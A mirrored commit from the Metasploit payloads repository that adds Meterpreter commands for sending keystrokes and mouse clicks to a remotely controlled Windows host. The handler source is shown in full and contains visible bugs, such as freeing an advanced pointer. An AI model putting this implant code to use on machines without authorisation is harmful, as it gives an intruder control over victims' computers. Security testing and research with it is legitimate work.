1
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-12-08 23:33:07 +01:00

Land #339, add keyboard and mouse control

This commit is contained in:
Brent Cook 2019-05-30 14:52:27 -05:00
commit ccdd418ab9
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
5 changed files with 127 additions and 0 deletions

View File

@ -143,6 +143,8 @@ Command customCommands[] =
COMMAND_REQ("stdapi_ui_desktop_get", request_ui_desktop_get), COMMAND_REQ("stdapi_ui_desktop_get", request_ui_desktop_get),
COMMAND_REQ("stdapi_ui_desktop_set", request_ui_desktop_set), COMMAND_REQ("stdapi_ui_desktop_set", request_ui_desktop_set),
COMMAND_REQ("stdapi_ui_desktop_screenshot", request_ui_desktop_screenshot), COMMAND_REQ("stdapi_ui_desktop_screenshot", request_ui_desktop_screenshot),
COMMAND_REQ("stdapi_ui_send_keys", request_ui_send_keys),
COMMAND_REQ("stdapi_ui_send_mouse", request_ui_send_mouse),
// Event Log // Event Log
COMMAND_REQ("stdapi_sys_eventlog_open", request_sys_eventlog_open), COMMAND_REQ("stdapi_sys_eventlog_open", request_sys_eventlog_open),

View File

@ -350,6 +350,48 @@ DWORD request_ui_get_keys_utf8(Remote *remote, Packet *request)
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }
/*
* Send keystrokes
*/
DWORD request_ui_send_keys(Remote *remote, Packet *request)
{
Packet *response = packet_create_response(request);
DWORD result = ERROR_SUCCESS;
wchar_t *keys = utf8_to_wchar(packet_get_tlv_value_string(request, TLV_TYPE_KEYS_SEND));
if (keys)
{
INPUT input[2] = {0};
input[0].type = INPUT_KEYBOARD;
input[0].ki.time = 0;
input[0].ki.wVk = 0;
input[0].ki.dwExtraInfo = 0;
input[0].ki.dwFlags = KEYEVENTF_UNICODE;
input[1].type = INPUT_KEYBOARD;
input[1].ki.time = 0;
input[1].ki.wVk = 0;
input[1].ki.dwExtraInfo = 0;
input[1].ki.dwFlags = KEYEVENTF_UNICODE | KEYEVENTF_KEYUP;
while (*keys != 0)
{
input[0].ki.wScan = *keys;
input[1].ki.wScan = *keys;
SendInput(2, input, sizeof(INPUT));
keys++;
}
free(keys);
}
else
{
result = 1;
}
// Transmit the response
packet_transmit_response(result, remote, response);
return ERROR_SUCCESS;
}
/* /*
* log keystrokes and track active window * log keystrokes and track active window
*/ */

View File

@ -34,3 +34,79 @@ DWORD request_ui_enable_mouse(Remote *remote, Packet *request)
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }
/*
* Send keystrokes
*/
DWORD request_ui_send_mouse(Remote *remote, Packet *request)
{
Packet *response = packet_create_response(request);
DWORD result = ERROR_SUCCESS;
DWORD action = packet_get_tlv_value_uint(request, TLV_TYPE_MOUSE_ACTION);
DWORD x = packet_get_tlv_value_uint(request, TLV_TYPE_MOUSE_X);
DWORD y = packet_get_tlv_value_uint(request, TLV_TYPE_MOUSE_Y);
INPUT input = {0};
input.type = INPUT_MOUSE;
input.mi.mouseData = 0;
if (action == 0)
{
input.mi.dwFlags = MOUSEEVENTF_MOVE;
}
else if (action == 1)
{
input.mi.dwFlags = MOUSEEVENTF_LEFTDOWN;
}
else if (action == 2)
{
input.mi.dwFlags = MOUSEEVENTF_LEFTDOWN;
}
else if (action == 3)
{
input.mi.dwFlags = MOUSEEVENTF_LEFTUP;
}
else if (action == 4)
{
input.mi.dwFlags = MOUSEEVENTF_RIGHTDOWN;
}
else if (action == 5)
{
input.mi.dwFlags = MOUSEEVENTF_RIGHTDOWN;
}
else if (action == 6)
{
input.mi.dwFlags = MOUSEEVENTF_RIGHTUP;
}
if (x != -1 || y != -1)
{
double width = GetSystemMetrics(SM_CXSCREEN)-1;
double height = GetSystemMetrics(SM_CYSCREEN)-1;
double dx = x*(65535.0f / width);
double dy = y*(65535.0f / height);
input.mi.dx = (LONG)dx;
input.mi.dy = (LONG)dy;
input.mi.dwFlags |= MOUSEEVENTF_ABSOLUTE;
}
SendInput(1, &input, sizeof(INPUT));
if (action == 1)
{
input.mi.dwFlags &= ~(MOUSEEVENTF_LEFTDOWN);
input.mi.dwFlags |= MOUSEEVENTF_LEFTUP;
SendInput(1, &input, sizeof(INPUT));
}
else if (action == 4)
{
input.mi.dwFlags &= ~(MOUSEEVENTF_RIGHTDOWN);
input.mi.dwFlags |= MOUSEEVENTF_RIGHTUP;
SendInput(1, &input, sizeof(INPUT));
}
// Transmit the response
packet_transmit_response(result, remote, response);
return ERROR_SUCCESS;
}

View File

@ -12,6 +12,9 @@ DWORD request_ui_stop_keyscan(Remote *remote, Packet *request);
DWORD request_ui_get_keys(Remote *remote, Packet *request); DWORD request_ui_get_keys(Remote *remote, Packet *request);
DWORD request_ui_get_keys_utf8(Remote *remote, Packet *request); DWORD request_ui_get_keys_utf8(Remote *remote, Packet *request);
DWORD request_ui_send_keys(Remote *remote, Packet *request);
DWORD request_ui_send_mouse(Remote *remote, Packet *request);
DWORD request_ui_desktop_enum( Remote * remote, Packet * request ); DWORD request_ui_desktop_enum( Remote * remote, Packet * request );
DWORD request_ui_desktop_get( Remote * remote, Packet * request ); DWORD request_ui_desktop_get( Remote * remote, Packet * request );
DWORD request_ui_desktop_set( Remote * remote, Packet * request ); DWORD request_ui_desktop_set( Remote * remote, Packet * request );

View File

@ -187,6 +187,10 @@
#define TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 3012 ) #define TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 3012 )
#define TLV_TYPE_KEYSCAN_TRACK_ACTIVE_WINDOW MAKE_CUSTOM_TLV( TLV_META_TYPE_BOOL, TLV_TYPE_EXTENSION_STDAPI, 3013 ) #define TLV_TYPE_KEYSCAN_TRACK_ACTIVE_WINDOW MAKE_CUSTOM_TLV( TLV_META_TYPE_BOOL, TLV_TYPE_EXTENSION_STDAPI, 3013 )
#define TLV_TYPE_KEYS_SEND MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 3014 )
#define TLV_TYPE_MOUSE_ACTION MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 3015 )
#define TLV_TYPE_MOUSE_X MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 3016 )
#define TLV_TYPE_MOUSE_Y MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 3017 )
// Event Log // Event Log
#define TLV_TYPE_EVENT_SOURCENAME MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 4000 ) #define TLV_TYPE_EVENT_SOURCENAME MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 4000 )